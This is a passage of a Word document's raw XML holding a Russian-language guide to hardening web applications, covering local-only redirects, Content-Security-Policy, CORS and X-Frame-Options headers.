          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>redirectUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66811006" w14:textId="77777777" w:rsidR="002C09BA" w:rsidRPr="002C09BA" w:rsidRDefault="002C09BA" w:rsidP="002C09BA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0050A168" w14:textId="77777777" w:rsidR="002C09BA" w:rsidRPr="002C09BA" w:rsidRDefault="002C09BA" w:rsidP="002C09BA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>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000088"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>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666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Url</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>IsLocalUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>redirectUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>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000088"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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660066"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Redirect</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>redirectUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304CC37C" w14:textId="77777777" w:rsidR="002C09BA" w:rsidRPr="002C09BA" w:rsidRDefault="002C09BA" w:rsidP="002C09BA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>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880000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C3D21F" w14:textId="7B889790" w:rsidR="002C09BA" w:rsidRDefault="002C09BA" w:rsidP="002C09BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422B5A29" w14:textId="69FD5222" w:rsidR="002C09BA" w:rsidRDefault="002C09BA" w:rsidP="002C09BA">
      <w:r>
        <w:t>В данном методе контроллера проверяется, принадлежит ли ссылка для перенаправления к локальному домену, и только если это условие выполняется, идет перенаправление на другую страницу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3644D212" w14:textId="321AE105" w:rsidR="002C09BA" w:rsidRDefault="00E67720" w:rsidP="00E67720">
      <w:r>
        <w:t xml:space="preserve">Также для противодействия злоумышленникам используется установление параметров </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>REST</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67720">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">заголовков (таких как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67720">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67720">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и т.д.). Для дополнительной защиты от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67720">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">можно использовать заголовок </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3376">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>content-security-policy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Он позволит загружать контент лишь с определ</w:t>
      </w:r>
      <w:r w:rsidR="00CB576D">
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">нных ресурсов, например можно разрешить запуск скриптов только с текущего сайта: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6579BDBF" w14:textId="5E9C07E9" w:rsidR="00E67720" w:rsidRDefault="00E67720" w:rsidP="00EF3376">
      <w:pPr>
        <w:pStyle w:val="22"/>
        <w:ind w:left="0" w:firstLine="708"/>
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E67720">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67720">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67720">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67720">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67720">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67720">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67720">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> script</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67720">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E67720">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E67720">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E67720">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'self'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8521C" w14:textId="2E86BC73" w:rsidR="00E67720" w:rsidRDefault="00E67720" w:rsidP="00E67720">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Также можно отключить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67720">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>чтобы веб приложение не обрабатывало запросы с других доменов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E8E2E1" w14:textId="4B3E6AA4" w:rsidR="00E67720" w:rsidRPr="00E67720" w:rsidRDefault="00E67720" w:rsidP="00E67720">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E67720">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E67720">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'Access-Control-Allow-Origin' '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mywebsite.org'</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67720">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5954A129" w14:textId="018AB76F" w:rsidR="00E67720" w:rsidRDefault="00E67720" w:rsidP="00E67720">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E67720">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E67720">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'Access-Control-Allow-Methods' '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A91F33" w14:textId="478AAFA6" w:rsidR="00434B16" w:rsidRDefault="00434B16" w:rsidP="00434B16">
      <w:r>
        <w:t xml:space="preserve">Для защиты от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clickjacking</w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">атак можно установить заголовок </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3376">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>X-FRAME-OPTIONS</w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">со значением </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3376">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>DENY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это запретит помещать страницы веб-сайта в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3376">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00434B16">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E81461A" w14:textId="4C37518F" w:rsidR="00434B16" w:rsidRDefault="00434B16" w:rsidP="00434B16">
      <w:r>
        <w:t>Злоумышленник может загрузить вредоносный код в виде файла с различными ра</w:t>
      </w:r>
      <w:r w:rsidR="00CB576D">
        <w:t>с</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ширениями, например используя в качестве тега </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>video</w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и может случиться так, что браузер распознает файл как код и выполнит его. Чтобы этого не произошло, может использоваться установка заголовка </w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:rPr>
          <w:rStyle w:val="pln"/>
